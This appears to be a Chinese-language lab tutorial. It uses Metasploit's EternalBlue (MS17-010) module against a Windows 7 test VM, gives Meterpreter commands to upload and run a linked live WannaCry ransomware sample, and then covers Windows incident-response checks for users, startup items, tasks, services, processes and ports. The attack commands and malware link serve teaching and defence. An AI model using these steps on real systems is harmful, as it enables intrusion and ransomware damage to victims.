admin 管理员组

文章数量: 887007

攻击机kali:192.168.83.136

靶机win7:192.168.83.144

注意开始攻击前要设置快照

一、漏洞复现

1.启动msf

简介:

Metasploit Framework(MSF)是一款开源安全漏洞检测工具,附带数千个已知的软件漏洞,并保持持续更新。Metasploit可以用来信息收集、漏洞探测、漏洞利用等渗透测试的全流程,被安全社区冠以“可以黑掉整个宇宙”之名。刚开始的Metasploit是采用Perl语言编写的,但是再后来的新版中,改成了用Ruby语言编写的了。在kali中,自带了Metasploit工具。我们接下来以大名鼎鼎的永恒之蓝MS17_010漏洞为切入点,讲解MSF框架的使用。

 msfconsole

2.搜索相关模块

永恒之蓝模块   命令:

search ms17-010

使用永恒之蓝攻击利用攻击模块

命令:  

use exploit/windows/smb/ms17_010_eternalblue

3.配置参数

命令:  

options

rhosts要求填写,目标主机的IP  192.168.83.144(靶机)

命令:

set rhosts 192.168.83.144

添加成功后再次options查看配置

4.开始攻击

命令:

run

开始利用漏洞模块攻击

获得目标主机权限

上面就是对msf17-010的使用,可以对win7进行操作

可以获取命令端口  shell

和其他的一些简单操作

后面的操作可以看这个师傅的

网络安全入门第一课—永恒之蓝(ms17-010)_ms17-010永恒之蓝-CSDN博客https://blog.csdn/m0_56088051/article/details/131682772?ops_request_misc=%7B%22request_id%22%3A%22171317287016777224471297%22%2C%22scm%22%3A%2220140713.130102334..%22%7D&request_id=171317287016777224471297&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~all~top_positive~default-1-131682772-null-null.142%5Ev100%5Epc_search_result_base5&utm_term=%E6%B0%B8%E6%81%92%E4%B9%8B%E8%93%9Dms17-010&spm=1018.2226.3001.4187

5.上传病毒

病毒样本链接

GitHub - limiteci/WannaCry: this repository contains the active DOS/Windows ransomware, WannaCrythis repository contains the active DOS/Windows ransomware, WannaCry - limiteci/WannaCryhttps://github/limiteci/WannaCry

把病毒样本的其中两个文件放到一个文件夹中,我这里放到的是text文件夹中

上传病毒样本

命令:

upload /home/kali/Desktop/text/wcry.exe

命令:

pwd

查看上传路径

命令:

execute -f wcry.exe

执行wcry.exe

命令:

ps -ef | grep wcry.exe

查看是否执行成功

登录win7靶机查看到了病毒上传成功

下面的是执行成功的win7桌面

原本的文件内容被加密了

发现被勒索了

防护措施

首先关闭网络接着恢复快照    

二、应急响应--事件排查

1.判断勒索家族种类

一般被加密后加密文档都存在一定的后缀,可以将改后缀上传到国内的勒索病毒平台分析,会给出相关的样本家族,以及少部分会提供有解密方案,但是大多数情况下难以解决

网址:

安全卫士勒索病毒专题:文件恢复_安全卫士离线救灾版_文档卫士https://lesuobingdu.360/

2.系统信息

//可以显示本地计算机的硬件资源、组件、软件环境、正在运行的任务、服务、系统驱动程序、加载模块、启动程序等。

C:\Users\test>msinfo32   //Microsoft系统信息工具:Msinfo32.exe

C:\Users\test>systeminfo //可查看主机名、操作系统等版本信息。

3.​​用户信息

攻击者入侵服务器后,可能会通过创建账号对服务器进行远程控制。常见的创建账号方法有:创建新账号、激活默认账号、建立隐藏账号(用户名后跟$的为隐藏账号)。

排查恶意账号的方法如下,如果存在恶意账号删除或者禁用:

C:\Users\test>net user    //查看所有用户,此方法无法查看隐藏用户

C:\Users\test>net user username    //查看指定用户信息

C:\Users\test>wmic useraccount get name,SID    //查看用户信息

C:\Users\test>lusrmgr.msc

4.启动项

启动项是系统开机时在前台或者后台运行的程序,攻击者有可能通过启动项使用病毒后门等实现持久化控制。
排查启动项的方法如下:

C:\Users\test>msconfig //命令行打开启动项

5.计划任务

查看计划任务属性,查看是否存在木马文件等。

C:\Users\test>taskschd.msc //获取计划任务信息

C:\Users\test>schtasks //获取计划任务信息(用户需是administrators组成员)

或直接打开计算机管理-->系统工具-->计划任务程序

6.服务自启动

//查看服务类型和启动状态,查看是否存在异常服务

C:\Users\test>services.msc

、进程、端口排查

1、进程排查

主机在感染恶意程序时,都会启动相应进程来完成恶意操作。
排查方法如下:

C:\Users\test>msinfo32   软件环境-->正在运行任务

2.端口排查

主要对端口的连接情况进行检查,排查是否存在远程连接、可疑连接。检查方法如下:

//查看目前的网络连接,定位可疑的ESTABLISHED

C:\Users\test>netstat -ano   或。  C:\Users\test>netstat -anb(需要管理员权限)

//根据netstat定位出的pid,通过tasklist命令进行进程定位

C:\Users\test>tasklist | findstr pid

//查看端口对应的PID

C:\Users\test>netstat -ano | findstr port

本文标签: 漏洞 上传